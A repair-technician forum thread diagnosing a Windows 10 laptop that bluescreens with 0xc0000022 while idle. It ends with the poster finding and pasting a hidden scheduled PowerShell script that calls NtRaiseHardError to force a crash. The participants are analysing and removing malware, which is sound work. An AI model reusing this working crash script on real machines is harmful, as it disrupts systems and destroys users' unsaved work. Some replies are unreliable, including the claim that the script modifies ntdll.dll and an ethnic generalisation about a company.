Windows 10 BSOD 0xc0000022

[Big Jim]

Have a laptop that is BSOD'ing anywhere between 10 and 60 minutes whilst sat Idle.

Mini dump text

Microsoft (R) Windows Debugger Version 10.0.21349.1004 AMD64
Copyright (c) Microsoft Corporation. All rights reserved.


Loading Dump File [C:\WINDOWS\MEMORY.DMP]
Kernel Bitmap Dump File: Kernel address space is available, User address space may not be available.

Symbol search path is: srv*
Executable search path is:
Windows 10 Kernel Version 19041 MP (4 procs) Free x64
Product: WinNt, suite: TerminalServer SingleUserTS
Edition build lab: 19041.1.amd64fre.vb_release.191206-1406
Machine Name:
Kernel base = 0xfffff803`4fa00000 PsLoadedModuleList = 0xfffff803`5062a290
Debug session time: Tue Jul 6 12:46:04.319 2021 (UTC + 1:00)
System Uptime: 0 days 0:51:49.077
Loading Kernel Symbols
...............................................................
................................................................
................................................................
..............................
Loading User Symbols
................................................................
................
Loading unloaded module list
...............
For analysis of this file, run !analyze -v
nt!KeBugCheckEx:
fffff803`4fdf6b90 48894c2408 mov qword ptr [rsp+8],rcx ss:ffff8281`47abc5a0=000000000000004c
1: kd> !analyze -v
*******************************************************************************
* *
* Bugcheck Analysis *
* *
*******************************************************************************

Unknown bugcheck code (c0000022)
Unknown bugcheck description
Arguments:
Arg1: 0000000000000000
Arg2: 0000000000000000
Arg3: 0000000000000000
Arg4: 0000000000000000

Debugging Details:
------------------


KEY_VALUES_STRING: 1

Key : Analysis.CPU.mSec
Value: 5780

Key : Analysis.DebugAnalysisManager
Value: Create

Key : Analysis.Elapsed.mSec
Value: 18251

Key : Analysis.Init.CPU.mSec
Value: 1499

Key : Analysis.Init.Elapsed.mSec
Value: 76476

Key : Analysis.Memory.CommitPeak.Mb
Value: 85

Key : WER.OS.Branch
Value: vb_release

Key : WER.OS.Timestamp
Value: 2019-12-06T14:06:00Z

Key : WER.OS.Version
Value: 10.0.19041.1


ERROR_CODE: (NTSTATUS) 0xc0000022 - {Access Denied} A process has requested access to an object, but has not been granted those access rights.

EXCEPTION_CODE_STR: c0000022

EXCEPTION_PARAMETER1: 0000000000000000

EXCEPTION_PARAMETER2: 0000000000000000

EXCEPTION_PARAMETER3: 0000000000000000

EXCEPTION_PARAMETER4: 0

BUGCHECK_CODE: c0000022

BUGCHECK_P1: 0

BUGCHECK_P2: 0

BUGCHECK_P3: 0

BUGCHECK_P4: 0

BLACKBOXBSD: 1 (!blackboxbsd)


BLACKBOXNTFS: 1 (!blackboxntfs)


BLACKBOXPNP: 1 (!blackboxpnp)


BLACKBOXWINLOGON: 1

PROCESS_NAME: powershell.exe

STACK_TEXT:
ffff8281`47abc598 fffff803`503af55a : 00000000`0000004c 00000000`c0000022 ffff8281`44c1b3f0 ffff890a`809e8f10 : nt!KeBugCheckEx
ffff8281`47abc5a0 fffff803`503a0f8f : ffff8281`47abc6c0 ffff8281`47abc660 ffff8281`47abc6c0 ffff8281`47abc660 : nt!PopGracefulShutdown+0x29a
ffff8281`47abc5e0 fffff803`503966fc : ffff890a`74d50101 ffff890a`00000006 00000000`00000005 fffff803`00000000 : nt!PopTransitionSystemPowerStateEx+0x11c9f
ffff8281`47abc6a0 fffff803`4fe085b8 : ffff8281`47abc898 ffff3579`881381cb 00000000`00000000 fffff803`50178595 : nt!NtSetSystemPowerState+0x4c
ffff8281`47abc880 fffff803`4fdfa9f0 : fffff803`502315a3 00000000`00000014 ffffffff`ffffff00 fffff803`50620a98 : nt!KiSystemServiceCopyEnd+0x28
ffff8281`47abca18 fffff803`502315a3 : 00000000`00000014 ffffffff`ffffff00 fffff803`50620a98 00000000`00000000 : nt!KiServiceLinkage
ffff8281`47abca20 fffff803`50162729 : 00000000`00000000 ffff890a`74c81900 00000000`00000000 00000000`00000000 : nt!PopIssueActionRequest+0xced5b
ffff8281`47abcac0 fffff803`4fcf3254 : 00000000`00000001 00000000`00000000 ffffffff`ffffffff fffff803`50623b00 : nt!PopPolicyWorkerAction+0x79
ffff8281`47abcb30 fffff803`4fd411b5 : ffff890a`00000001 ffff890a`80df4040 fffff803`4fcf31c0 00000000`00000000 : nt!PopPolicyWorkerThread+0x94
ffff8281`47abcb70 fffff803`4fcf5345 : ffff890a`80df4040 00000000`00000080 ffff890a`74c5c080 000fa425`bd9bbfff : nt!ExpWorkerThread+0x105
ffff8281`47abcc10 fffff803`4fdfe1e8 : ffffd800`39200180 ffff890a`80df4040 fffff803`4fcf52f0 ffff8281`47abcc80 : nt!PspSystemThreadStartup+0x55
ffff8281`47abcc60 00000000`00000000 : ffff8281`47abd000 ffff8281`47ab7000 00000000`00000000 00000000`00000000 : nt!KiStartSystemThread+0x28


SYMBOL_NAME: nt!PopTransitionSystemPowerStateEx+11c9f

MODULE_NAME: nt

IMAGE_NAME: ntkrnlmp.exe

STACK_COMMAND: .thread ; .cxr ; kb

BUCKET_ID_FUNC_OFFSET: 11c9f

FAILURE_BUCKET_ID: STATUS_ACCESS_DENIED_nt!PopTransitionSystemPowerStateEx

OS_VERSION: 10.0.19041.1

BUILDLAB_STR: vb_release

OSPLATFORM_TYPE: x64

OSNAME: Windows 10

FAILURE_ID_HASH: {7fcb0a96-b639-2e09-82d6-2eef48bdcdea}

Followup: MachineOwner

So this is related to some kind of power state change ?
I have ran a tool to fix permissions but that didn't fix it.
SFC did find and fix problems but the issue is still present.

All drivers have been updated.

the laptop is set to sleep never on battery or power, and also the option to sleep had been removed from the start menu, advanced power settings all look normal as well.



Any ideas ?

 

[sapphirescales]

When I get a computer in with a weird problem like this, I just do a nuke n' pave. I tell the client that it will *probably* fix the problem, but if it doesn't, I'll put 100% of what they paid for the service towards another computer.

Modern computers are so complicated there's no way to know with 100% certainty what the problem is, or heck, whether it's caused by software or hardware. You can guess and swap parts, but even with a desktop with 100% modular components it's a crap shoot. With a laptop with only a few components that are worth swapping, it's best to just do a nuke n' pave to rule out any software issues and then if the issue persists, just trade the sucker in.

It's all about time vs. money. If it takes me 4 hours to diagnose an issue and I'm not making at least $150/hour on the repair, it's better off to just throw away stuff that might be perfectly good in order to save time.

As much as I love computers and as much as I hate not getting to the bottom of some problems, I'm running a business. It's my responsibility as a business owner to maximize profits while also offering the best value to my client. If one of us is getting the shaft (myself, my client, or the computer), the computer is the obvious choice as it's just an inanimate object at the end of the day.

That being said, you might want to invest in some professional diagnostic software such as Pc-Check or PC Doctor Service Center. These tools have helped me diagnose very weird/intermittent issues and don't take long to run. They're not 100% accurate, but will give you some assurances. If the hardware checks out with these tools, it's an even better indication that you should just do a nuke n' pave to see if it fixes the problem.

 

[nlinecomputers]

Event logs? Other things are crashing with this. This is just the final thing that died.

What hardware is this? No offense, but when you have a hardware question just saying that you have a generic laptop on the bench is worthless.

Download and run whocrashed. https://www.resplendence.com/whocrashed
Its a good dump analyzer better than trying to read a dump by hand.

 

[Big Jim]

Event logs? Other things are crashing with this. This is just the final thing that died.

What hardware is this? No offense, but when you have a hardware question just saying that you have a generic laptop on the bench is worthless.

Download and run whocrashed. https://www.resplendence.com/whocrashed
Its a good dump analyzer better than trying to read a dump by hand.

I didn't mention hardware as I don't believe this to be a hardware related problem, the dump says that something asked for permission to do something and it was denied and that is what caused the crash.

FWIW I changed the sleep settings to 30 minutes and it has slept and woke up no problem.
I'll try changing it to 60 minutes sleep and see if the BSOD still happens

 

[Porthos]

and also the option to sleep had been removed from the start menu

The Video driver is missing or wrong if you are missing sleep in the start menu.

 

[Sky-Knight]

It's a driver issue, namely a driver with a bad permission on it, or a faulty driver.

You can spend buckets of time booting into preboot, and trying to debug which one... or you can nuke and pave it.

 

[nlinecomputers]

Windows is pretty damn stable. These days most BSOD errors are hardware related. Faulty memory or dirty power. And you can get permission errors if the object you are trying to access is missing or crashed.

 

[britechguy]

Also, and I'll be the contrarian, again, but I always do a Repair Install with the ISO file before doing a nuke & pave if the hardware in question has a lot of human time and effort already expended in configuring it to its purpose. Way over 90% of the time I've found that is sufficient to do what we have typically had to do a nuke & pave for in the past.

If I suspect something in Windows, the steps are always, in order, and progressing to subsequent ones only if nothing's worked so far:

1. Using SFC (System File Checker) and DISM (Deployment Imaging Servicing and Management) to Repair Windows 8 & 10

2. Doing a Windows 10 Repair Install or Feature Update Using the Windows 10 ISO file

3. Doing a Completely Clean (Re)install of Windows 10 Using Media Creation Tool to Fetch the Win10 ISO File
(and the part about fetching the ISO file has already been done for #2, which is why I'm not using the MCT in this instance to create bootable media. If that's your preference, then go for that route instead).

 

[sapphirescales]

Also, and I'll be the contrarian, again, but I always do a Repair Install with the ISO file before doing a nuke & pave

That doesn't take care of driver or other software issues though. It's very rare that an actual Windows file is the culprit. With all the garbage preloaded on modern computers, not to mention outdated drivers, any of that crap could be causing issues.

 

[britechguy]

That doesn't take care of driver or other software issues though.

Correct. But it certainly does give you a pointer as to whether it was a Windows issue or not. And my experience is that, as often as not, it is a corruption, however subtle and irregularly hit, that has crept into the OS.

But, if things keep BSOD-ing, then the nuke and pave is the next option. It's a progression, and one that's worked like a charm for me since the advent of Windows 10.

 

[Sky-Knight]

@britechguy And in my experience Windows 10 is so stable that when it does BSOD, it's doing so on boot. You can't do a repair install on the machine if it won't start!

 

[alexsmith2709]

Does this happen in safe mode?
My understanding on the dump is that powershell may be the cause. Is there any background scripts using powershell that run at the time it crashes? What happens if you open powershell?
Have you tried using process monitor https://docs.microsoft.com/en-gb/sysinternals/downloads/procmon to see if that gives any indication of what is getting the access denied error? This may be difficult depending on how much time is between the access denied error and the BSOD.
Is there a restore point you can go back to? If so, check the "affected programs" before doing the restore and that may narrow it down to a recently installed bit of software or a windows update. If reinstalling that software/update check if it does it again or not.

 

[britechguy]

You can't do a repair install on the machine if it won't start!

Absolutely true. But that was not the circumstance the OP described. I am trying to address that, not all possible circumstances.

 

[Big Jim]

I think I found the issue.
There is a task set to run every hour starting at 09:46, it just crashed at 18:46

powershell.exe -executionpolicy bypass -file c:\WINDOWS\TEMP\maint.ps1


not exactly sure what this is for however.

this is the text from the file in the task

$source = @"
using System;
using System.Runtime.InteropServices;
public static class CS{
[DllImport("ntdll.dll")]
public static extern uint RtlAdjustPrivilege(int Privilege, bool bEnablePrivilege, bool IsThreadPrivilege, out bool PreviousValue);
[DllImport("ntdll.dll")]
public static extern uint NtRaiseHardError(uint ErrorStatus, uint NumberOfParameters, uint UnicodeStringParameterMask, IntPtr Parameters, uint ValidResponseOption, out uint Response);
public static unsafe void Kill(){
Boolean tmp1;
uint tmp2;
RtlAdjustPrivilege(19, true, false, out tmp1);
NtRaiseHardError(0xc0000022, 0, 0, IntPtr.Zero, 6, out tmp2);
}
}
"@
$comparams = new-object -typename system.CodeDom.Compiler.CompilerParameters
$comparams.CompilerOptions = '/unsafe'
$a = Add-Type -TypeDefinition $source -Language CSharp -PassThru -CompilerParameters $comparams
[CS]::Kill()

 

[Sky-Knight]

I think I found the issue.
There is a task set to run every hour starting at 09:46, it just crashed at 18:46

powershell.exe -executionpolicy bypass -file c:\WINDOWS\TEMP\maint.ps1


not exactly sure what this is for however.

That positively screams malware...

 

[Big Jim]

That positively screams malware...

Some odd stuff on this laptop
Sleep missing from start menu (this was unticked in power settings)
windows is activated using your companies activation service (normally this says activated with a digital license)
there is some software on there from these guys https://jpt-solutions.com/support/ set to run at startup looked like remote support software
There was another IT companies web page set to load in a 2nd tab with Chrome as well.

Haven't spoken to customer yet but am wondering if she has been scammed on the phone or if she went to these companies herself, she is a repeat customer who lives locally so I don't see any reason for her to have gone elsewhere, thats not to say it hasn't happened though

 

[nlinecomputers]

That positively screams malware...

Agreed. It's trying to modify ntdll.dll

Check the antivirus logs, if any, for past events. Could be the remnant of a ransomware attack that got kneecapped by the AV. I'm inclined to zero out the drive and reinstall.

 

[Sky-Knight]

@Big Jim Did you look at that link?

"Working Together Beautifully "

That's a VERY Chinese or Korean thing... that's not western in the least. So I suspect you're right, and she got scammed or paid an untrusted source to do some work. Either way... I'm leaning much harder on the nuke and pave button. Going to have to contact the client first of course.

 

[Big Jim]

Agreed. It's trying to modify ntdll.dll

Check the antivirus logs, if any, for past events. Could be the remnant of a ransomware attack that got kneecapped by the AV. I'm inclined to zero out the drive and reinstall.

Might have suceede because the laptop originally came to us with cannot find OS error message.
we used a tool to repair the Boot files which got it booting again, I think my tech then updated to the latest version of windows via USB (he is off today so not 100% on that) all AV logs are cleared before 03/07.

It has Kaspersky on it though, and both Kaspersky and Malwarebytes have just detected the same program in Program data "centra stage" csrss32.exe which as far as I can tell is a legit windows file that should be in the windows folder so this is named the same to fool people

 

[alexsmith2709]

That script looks like it has the instruction to cause that BSOD code if it doesn't get the privileges it wants.
I have no idea what the script wants to do, but it certainly doesn't look legitimate so removing that task should solve that problem. The question remains as to how much other crap is on there and what has been/may have been compromised